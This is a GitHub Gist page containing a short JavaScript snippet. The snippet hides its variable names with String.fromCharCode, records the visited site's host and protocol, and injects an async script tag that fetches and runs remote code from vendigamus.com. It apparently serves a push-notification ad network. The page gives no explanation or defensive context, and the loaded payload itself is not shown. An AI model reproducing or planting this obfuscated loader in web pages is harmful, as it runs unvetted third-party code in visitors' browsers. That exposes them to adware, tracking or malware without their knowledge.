Created
May 26, 2020 11:50
-
-
Save gonzazoid/1692f4e8b606b3a15e2f53c437a8d87c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function () { | |
var url = String.fromCharCode(112,117,115,104,95,117,114,108); | |
var cfg = String.fromCharCode(119,112,110,67,111,110,102,105,103); | |
window[cfg] = { | |
utm_source: 'og', | |
utm_campaign: 20914, | |
utm_content: '______', | |
domain: window.location.host, | |
proto: window.location.protocol | |
}; | |
window[cfg][url] = 'https://vendigamus.com/46964.js'; | |
var s = document.createElement('script'); | |
s.setAttribute('async', 1); | |
s.setAttribute('data-cfasync', false); | |
s.src = window[cfg][url]; | |
document.head && document.head.appendChild(s) | |
})(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment